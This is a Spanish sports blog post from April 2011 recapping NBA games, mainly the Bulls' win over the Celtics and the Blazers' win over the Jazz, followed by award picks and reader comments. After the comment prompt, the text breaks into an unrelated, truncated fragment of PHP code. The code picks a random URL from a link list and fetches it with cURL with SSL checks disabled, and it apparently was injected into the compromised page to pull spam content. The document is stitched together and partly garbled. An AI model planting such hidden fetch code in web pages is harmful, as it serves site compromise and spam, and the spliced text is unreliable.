La Crónica (07/04/2011)

08 de April de 2011 por Hynreck

Anoche quedaron claras varias cosas en el Este: Por una lado que, salvo catástrofe, los Bulls tendrán ventaja de campo hasta la final y que siguen optando a desbancar a los Spurs, y por el otro, que Derrick Rose será MVP.

Los Bulls vencieron cómodamente a los Celtics gracias a la gran defensa planteada por Tom Thibodeau, que oposita también al “coach of the year” (81-97). Los verdes sólo fueron capaces de anotar el 38% de sus tiros de campo y su Big Three fue superado claramente por el que conforman Rose, Deng y Boozer, posiblemente sin tanto glamour pero, anoche, mucho  más efectivo. Derrick Rose se fue hasta los 30 puntos 8 asistencias y 5 rebotes con un 60% en tiros de campo,  Deng llegó hasta los 23 puntos y Boozer consiguió las dobles figuras con 14 puntos y 12 rebotes. En Boston, Rondo sigue dando muestras de atravesar un bache en el peor momento de la temporada y ya parecen haber renunciado a jugar con un center de garantías. Glen Davis por si solo, no es suficiente para pelear en igualdad de condiciones en la pintura contra otros monstruos de la liga.

En el otro partido de la jornada los Blazers vencieron a domicilio a los Jazz 98-87 con una gran actuación de Gerald Wallace. Los Playoffs los tienen asegurados aunque no parece que su recorrido pueda ir más allá de la primera ronda. De todas maneras es un éxito para un equipo tan terriblemente castigado por las lesiones. Los Jazz, tras una decepcionante temporada en la que han perdido a su jugador estrella y al gran Jerry Sloan, deberán reinventarse y empezar una nueva era cuyos primeros años se preveen duros.

PREMIOS

MVP: Seguramente se lleve también el de la temporada regular, pero el MVP TJ seguro que le hace más ilusión: Derrick Rose.

Rookie: La pareja de rookies de los Jazz puede ser importante en años venideros. Derrick Favors consiguió 8 puntos y 7 rebotes y Gordon Hayward, 10 puntos y 3 rebotes.

Sorpresa: Hoy dejaríamos en blanco esta sección, por dárselo a alguien quizás los 26 puntos de Devin Harris en una temporada la suya que está siendo bastante mediocre.

Decepción: El otro día se nos pasó, pero hoy no se escapa. Rudy Fernandez, 13 minutos, 0 puntos, 3 asistencias y un rebote. ¿Volverá a Europa?

Esfuerzo en vano: Paul Millsap, 19 puntos y 10 rebotes. Su temporada también ha ido de más a menos. No ha podido hacer olvidar a Boozer.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. KB # 24 dice:
    #1

    De verdad creéis que si este partido hubiera sido de semis o final de conferencia hubiese habido el mismo resultado y sacaríamos las mismas conclusiones??

    Siempre leo que en postemporada es donde la experiencia es realmente importante (véase cav’s de lebron, thunders del año pasado, lakers de gasol de 2008,…)

    Me gustaría poder imaginarme un equipo “nuevo” como estos bulls ganando un anillo, pero me cuesta. Aunque los C’s de 2008 lo lograsen… No acabo de ver a estos bulls saliendo campeones, como tampoco veo a los spurs siendo barridos en 1a o 2a ronda.

      Citar

  2. Javijaen dice:
    #2

    Menuda paliza de Bulls a Celtics, sobre todo mirando estadísticas, y es que le ganan en absolutamente todo. Veremos si es que los del trébol están reservándose para entrar en el “modo playoff”. Por cierto, Ray Allen 7 puntos… MVP para Rose esperemos que seguro, que este base puede ser el próximo referente de la NBA cuando Nash se retire…
    En cuanto a Blazers, parece que le vendría mejor jugar contra Thunder que contra Mavs. ¿Cómo lo veis?

      Citar

  3. Txusma dice:
    #3

    Cuenta la experiencia pero hace un par de años Rose y Gordon ya estuvieron a puntito de armarla en primera ronda contra los verdes. Y estos Bulls son mucho mejores y los Celtics algo peores, creo yo.

      Citar

  4. Pop dice:
    #4

    ¿Qué de cierto hay en los rumores sobre la entrada de J. Sloan a Lakers la próxima temporada?

      Citar

  5. CAMPO2 dice:
    #5

    Yo creo que este año los Celtics en play offs no llegaran muy lejos, 1ª o 2ª ronda, porque el orgullo no te va a sacar siempre las castañas del fuego

      Citar

  6. CAMPO2 dice:
    #6

    El post de antes me lo anoto para el momento de la verdad sacarlo o bien como visionario o bien para llevarme los palos pertinentes

      Citar

  7. Txusma dice:
    #7

    A mi me da que lo de Sloan a los Lakers era una idea feliz de algún bloguero elevado a la categoría de noticia por MARCA

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>